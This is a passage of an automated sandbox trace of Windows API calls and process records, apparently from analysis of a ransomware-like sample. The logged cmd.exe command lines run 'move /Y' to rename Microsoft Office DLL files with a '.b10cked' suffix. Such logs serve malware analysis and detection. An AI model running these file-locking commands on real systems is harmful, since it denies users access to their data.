\"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked\"" [0160.858] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0160.858] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x341970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0160.858] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0160.858] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0160.858] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0160.858] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0160.858] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0160.858] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0160.858] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0160.858] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0160.858] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0160.858] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0160.858] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0160.858] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0160.859] GetEnvironmentStringsW () returned 0x342360* [0160.859] FreeEnvironmentStringsW (penv=0x342360) returned 1 [0160.859] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.859] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0160.859] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0160.859] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0160.859] 
_wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0160.859] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0160.859] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0160.859] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0160.859] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0160.859] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0160.859] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf558 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0160.859] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf558, lpFilePart=0x1cf554 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf554*="Desktop") returned 0x18 [0160.859] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0160.859] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf2d4 | out: lpFindFileData=0x1cf2d4) returned 0x3409f0 [0160.859] FindClose (in: hFindFile=0x3409f0 | out: hFindFile=0x3409f0) returned 1 [0160.860] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf2d4 | out: lpFindFileData=0x1cf2d4) returned 0x3409f0 [0160.860] FindClose (in: hFindFile=0x3409f0 | out: hFindFile=0x3409f0) returned 1 [0160.860] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf2d4 | out: lpFindFileData=0x1cf2d4) returned 0x3409f0 [0160.860] FindClose (in: hFindFile=0x3409f0 | out: hFindFile=0x3409f0) returned 1 [0160.860] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0160.860] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0160.860] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0160.860] GetEnvironmentStringsW () returned 0x340210* 
[0160.860] FreeEnvironmentStringsW (penv=0x340210) returned 1 [0160.860] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0160.861] GetConsoleOutputCP () returned 0x1b5 [0160.861] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0160.861] GetUserDefaultLCID () returned 0x409 [0160.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0160.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf698, cchData=128 | out: lpLCData="0") returned 2 [0160.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf698, cchData=128 | out: lpLCData="0") returned 2 [0160.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf698, cchData=128 | out: lpLCData="1") returned 2 [0160.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0160.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0160.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0160.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0160.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0160.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0160.862] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0160.862] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0160.862] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 
[0160.862] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0160.862] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0160.862] GetConsoleTitleW (in: lpConsoleTitle=0x330930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.863] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0160.863] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0160.863] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0160.863] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0160.863] _wcsicmp (_String1="move", _String2=")") returned 68 [0160.863] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0160.863] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0160.863] _wcsicmp (_String1="IF", _String2="move") returned -4 [0160.863] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0160.863] _wcsicmp (_String1="REM", _String2="move") returned 5 [0160.863] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0160.867] GetConsoleTitleW (in: lpConsoleTitle=0x1cf390, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.867] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0160.867] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0160.867] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0160.867] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0160.867] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0160.867] _wcsicmp (_String1="move", _String2="CD") returned 10 [0160.867] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0160.867] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0160.867] _wcsicmp (_String1="move", _String2="REN") returned -5 [0160.867] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0160.867] 
_wcsicmp (_String1="move", _String2="SET") returned -6 [0160.867] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0160.867] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0160.867] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0160.867] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0160.867] _wcsicmp (_String1="move", _String2="MD") returned 11 [0160.867] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0160.867] _wcsicmp (_String1="move", _String2="RD") returned -5 [0160.867] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0160.867] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0160.867] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0160.867] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0160.867] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0160.867] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0160.867] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0160.867] _wcsicmp (_String1="move", _String2="VER") returned -9 [0160.867] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0160.867] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0160.868] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0160.868] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0160.868] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0160.868] _wcsicmp (_String1="move", _String2="START") returned -6 [0160.868] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0160.868] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0160.868] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0160.869] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0160.869] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0160.869] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf14c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf144, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, 
lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf144*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) 
returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0160.871] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0160.871] _wcsicmp (_String1="WWINTL~1.TRX", _String2=".") returned 73 [0160.871] _wcsicmp (_String1="WWINTL~1.TRX", _String2="..") returned 73 [0160.871] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl~1.trx")) returned 0x2020 [0160.871] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x341f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0160.871] SetErrorMode (uMode=0x0) returned 0x0 [0160.871] SetErrorMode (uMode=0x1) returned 0x0 [0160.871] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x1cead4, lpFilePart=0x1ceabc | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX", lpFilePart=0x1ceabc*="WWINTL~1.TRX") returned 0x3c [0160.871] SetErrorMode (uMode=0x0) returned 0x1 [0160.871] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0160.871] _wcsicmp (_String1="WWINTL~1.TRX", _String2=".") returned 73 [0160.871] _wcsicmp (_String1="WWINTL~1.TRX", _String2="..") returned 73 [0160.871] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl~1.trx")) returned 0x2020 [0160.871] SetErrorMode (uMode=0x0) returned 0x0 [0160.872] SetErrorMode (uMode=0x1) returned 0x0 [0160.872] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x1cef50, lpFilePart=0x1cece8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX", lpFilePart=0x1cece8*="WWINTL~1.TRX") returned 0x3c [0160.872] SetErrorMode (uMode=0x0) returned 0x1 [0160.872] SetErrorMode (uMode=0x0) returned 0x0 [0160.872] SetErrorMode (uMode=0x1) returned 0x0 [0160.872] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1cf158, lpFilePart=0x1cece8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked", lpFilePart=0x1cece8*="WWINTL.DLL.trx_dll.b10cked") returned 0x4a [0160.872] SetErrorMode (uMode=0x0) returned 0x1 [0160.872] SetLastError (dwErrCode=0x0) [0160.872] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl.dll.trx_dll.b10cked")) returned 0xffffffff [0160.872] GetLastError () 
returned 0x2 [0160.872] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x1ce664, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce664) returned 0x342128 [0160.872] FindNextFileW (in: hFindFile=0x342128, lpFindFileData=0x1ce664 | out: lpFindFileData=0x1ce664) returned 0 [0160.873] GetLastError () returned 0x12 [0160.873] FindClose (in: hFindFile=0x342128 | out: hFindFile=0x342128) returned 1 [0160.874] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x341cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x341cb8) returned 0x342128 [0160.874] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1ce8fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4a [0160.874] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x1ce8fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x42 [0160.874] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl.dll.trx_dll")) returned 0x2020 [0160.874] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked" (normalized: 
"c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0160.875] FindClose (in: hFindFile=0x342128 | out: hFindFile=0x342128) returned 1 [0160.875] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1ce8b0 | out: _Buffer=" 1") returned 9 [0160.875] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.875] GetFileType (hFile=0x7) returned 0x2 [0160.876] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.876] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ce83c | out: lpMode=0x1ce83c) returned 1 [0160.876] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.876] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ce870 | out: lpConsoleScreenBufferInfo=0x1ce870) returned 1 [0160.877] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0160.877] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1ce8b0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0160.877] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1ce894, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ce894*=0x1a) returned 1 [0160.881] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.881] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0160.881] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.881] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0160.884] _get_osfhandle (_FileHandle=0) returned 0x3 [0160.884] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0160.884] SetConsoleInputExeNameW () returned 0x1 [0160.885] GetConsoleOutputCP () returned 0x1b5 [0160.885] 
GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0160.885] SetThreadUILanguage (LangId=0x0) returned 0x409 [0160.885] exit (_Code=0) Process: id = "274" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0x90c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22233 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22234 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22235 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22236 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 22237 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22238 start_va = 0x77230000 end_va = 0x7736bfff 
entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22239 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22240 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22241 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 22242 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22243 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22244 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22245 start_va = 0x80000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 22246 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22247 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 22248 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22249 start_va = 0x75540000 end_va = 0x75589fff entry_point = 
0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22250 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22251 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22252 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22253 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22254 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22255 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22256 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22257 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 22258 start_va = 0x76490000 end_va = 